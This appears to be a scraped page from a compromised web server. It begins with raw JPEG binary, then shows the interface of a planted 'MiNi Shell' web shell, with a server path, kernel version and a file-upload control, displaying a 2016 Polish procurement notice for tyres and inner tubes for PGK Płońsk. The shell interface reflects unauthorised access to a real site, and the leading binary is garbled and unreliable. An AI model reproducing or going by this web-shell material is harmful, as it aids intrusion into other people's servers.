JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161004/317492-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317492 - 2016
              z dnia 2016-10-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Płońsk: Sukcesywne dostawy transportem wykonawcy ogumienia (opon i dętek) do pojazdów należących do PGK w Płońsku Sp. z o.o. z podziałem na dwa zadania:
Zadanie I  opony, dętki różne
Zadanie II  opony przemysłowe
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Przedsiębiorstwo Gospodarki Komunalnej w Płońsku Spółka z o.o., krajowy numer identyfikacyjny
              13031457400000, ul.
              ul. Mickiewicza 
              4,
              09100  
              Płońsk, woj.
              mazowieckie, państwo
              , tel.
              023 6624278 w, 35, e-mail
              zamowienia@pgk.plonsk.pl, faks
              236 624 278.
              <br />
              Adres strony internetowej (URL): www.pgk.plonsk.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.pgk.plonsk.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.pgk.plonsk.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.pgk.plonsk.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy przesłać lub złożyć z zachowaniem formy pisemnej w języku polskim.<br />
                Adres:
                <br />Przedsiębiorstwo Gospodarki Komunalnej w Płońsku Sp. z o.o. 09-100 Płońsk, ul. Mickiewicza 4</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywne dostawy transportem wykonawcy ogumienia (opon i dętek) do pojazdów należących do PGK w Płońsku Sp. z o.o. z podziałem na dwa zadania:
Zadanie I  opony, dętki różne
Zadanie II  opony przemysłowe
<br /><b>Numer referencyjny: </b>10/PN/ogum/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie I Opony i dętki różne
1.Opona napędowa nowa 	265/70 R 17,5 szt.16
2.	Opona prowadząca nowa 	265/70 R 17,5 szt.8
3.	Opona prowadząca nowa 	215/75 R17,5 szt.2
4.	Opona letnia 	195/75 R16C szt. 6
5.	Opona zimowa nowa	195/75 R16C szt. 6
6.	Opona letnia nowa 	225/75 R 16 C szt. 12
7.	Opona zimowa nowa	225/75 R 16 C szt.12
8.	Opona napędowa nowa 	245/70 R 17,5 szt.8
9.	Opona zimowa nowa	195/65 R15 szt.	8
10.	Opona letnia nowa	195/70 R 15C szt.4
11.	Opona zimowa nowa	195/70 R15C szt.4
12.	Opona letnia nowa	225/70 R15C szt.4
13.	Opona zimowa nowa	225/70 R15C szt.4
14.	Opona letnia nowa	195/65 R15 szt.	8
15.	Opona prowadząca nowa 	305/70R 19,5 szt.2
16.	Opona napędowa nowa	305/70R 19,5 szt.4
17.	Opona prowadząca nowa 	265/70R 19,5 szt.2
18.	Opona napędowa nowa 	265/70R 19,5 szt.4
19.	Opona prowadząca nowa 	285/70R 19,5 szt.2
20.	Opona napędowa nowa 	285/70 R19,5 szt.4
21.	Opona prowadząca nowa 	10R 17,5 szt.2
22.	Opona napędowa nowa	10R 17,5 szt.4
23.	Opona nowa (przednia)	245/70R 17,5 szt.6
24.	Opona prowadząca nowa 	205/75R 17,5 szt.2
25.	Opona napędowa  nowa 	205/75R 17,5 szt.4
26.	Opona prowadząca nowa 	275/70R 22,5 szt.2
27.	Opona nowa z bieżnikiem naczepowym 425/65 R 22,5 szt.4
28.	Opona prowadząca nowa	12 R 22,5 szt.2
29.	Opona bieżnikowana napędowa	12 R 22,5 szt.6
30.	Opona prowadząca nowa 	315/70 R 22,5 szt.4
31.	Opona bieżnikowana napędowa	315/70 R 22,5 szt.12
32.	Opona prowadząca nowa 	385/65 R 22,5 szt.4
33.	Opona prowadząca nowa 	315/80 R 22,5 szt.12
34.	Opona napędowa bieżnikowana	315/80 R 22,5 szt.36
35.	Opona prowadząca nowa 	10 R 22,5 szt.2
36.	Opona napędowa bieżnikowana	10 R 22,5 szt.4
37.	Opona prowadząca nowa 	295/80 R 22,5 szt.2
38.	Opona napędowa nowa	295/80 R 22,5 szt.4
39.	Opona nowa CARGO C3 PLUS	385/65 R 22,5 szt.6
40.	Opona prowadząca nowa 	8,25 R 20 szt.2
41.	Opona napędowa bieżnikowana	8,25 R 20 szt.4
42.	Opona prowadząca nowa 	11 R 22,5 szt.4
43.	Opona napędowa bieżnikowana	11R 22,5 szt.10
44.	Opona prowadząca nowa 	900 R 20 szt.2
45.	Opona napędowa bieżnikowana	900 R 20 szt.4
46.	Opona letnia nowa 	205/65 R15 szt.	4
47.	Opona zimowa nowa	205/65 R15 szt.	4
48.	Opona napędowa nowa	225/75 R17,5 szt.4
49.	Opona letnia nowa	215/75 R 16C szt.4
50.	Opona zimowa nowa	215/75 R 16C szt.4
51.	Opona letnia nowa	215/70 R 15C szt.4
52.	Opona zimowa nowa	215/70 R 15C szt.4
53.	Opona rolnicza 	10,0/75-15,3 szt.4
54.	Opona rolnicza 	12,5/80-15,3 szt.4
55.	Opona rolnicza 	400/60-15,5 szt.10
56.	Opona rolnicza 	600-16 szt.6
57.	Opona rolnicza 	7,5-16 szt.2
58.	Opona rolnicza 	14,9 R28 szt.2
59.	Opona rolnicza 	12,4 R32 szt.2
60.	Opona rolnicza 	13,6 R 36 szt.2
61.	Opona rolnicza 	340/85 R24 szt.	2
62.	Opona rolnicza 	420/85 R 34 szt.2
63.	Opona rolnicza 	460/85 R 34 szt.2
64.	Opona rolnicza 	13,6 R 24 szt.2
65.	Opona nowa	400 R 22,5 szt.4
66.	Opona nowa prowadząca 	305/70 R22,5 szt.2
67.	Opona rolnicza 	16,5/85-24 szt.	2
68.	Dętka	8,25-15 szt.4
69.	Dętka	400/60-15,5 szt.15
70.	Dętka	10.0/75-15,3 szt.10
71.	Dętka	12,5/80-15,3 szt.10
72.	Dętka	6,00-16 szt.6
73.	Dętka	9,00-20 szt.2
74.	Dętka	6,50 - 16 szt.4
75.	Dętka	7,50 - 16 szt.2
76.	Dętka	12,5/80 - 18 szt.6
77.	Dętka	7,50 - 20 szt.2
78.	Dętka	8,25 - 20 szt.6
79.	Dętka	13,6 - 24 szt.2
80.	Dętka	18,4 - 26 szt.2
81.	Dętka	14,9 - 28 szt.4
82.	Dętka	13,6 - 36 szt.2
83.	Dętka	16,5/85 R24 szt. 4

Zadanie II opony przemysłowe
1.	Opona rolnicza 	11L-16SL szt.2
2.	Opona rolnicza 	16,9-28	szt.2
3.	Opona przemysłowa nowa	26,5 R25 szt.4
4.	Opona bieżnikowana (bieżnik jodełkowy)	10,00-20 szt.8
5.	Opona przemysłowa	20,5-25 szt.4
6.	Opona przemysłowa	12,5/80-18 szt.	2
7.	Opona przemysłowa	18,4-26 szt.2
8.	Opona pełna 	12,00-24 szt.8
9.	Opona pełna	7.00-12TL szt.6
10.	Opona pełna	6.00-9TL szt.6
11.	Opona przemysłowa	460/70 R24 szt.2
12.	Opona przemysłowa	340/80 R18 szt.	2

<br /><br /><b>II.5) Główny kod CPV: </b>34352100-0<br /><b> Dodatkowe kody CPV:</b>34913200-2,
                34351100-3,
                19511200-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                zamawiający nie precyzuje wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie precyzuje wymagań.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W celu potwierdzenia spełniania powyższego warunku wykonawcy wykażą, że posiadają doświadczenie w realizacji dostaw ogumienia (opon, dętek) o wartości porównywalnej do składanej oferty, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,w tym okresie. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie, że wykonawca nie podlega wykluczeniu (art. 24 ust. 1 uPZP) wg załącznika nr 3 do siwz aktualne na dzień składania ofert, stanowiące wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95</td></tr><tr><td>Termin płatności</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
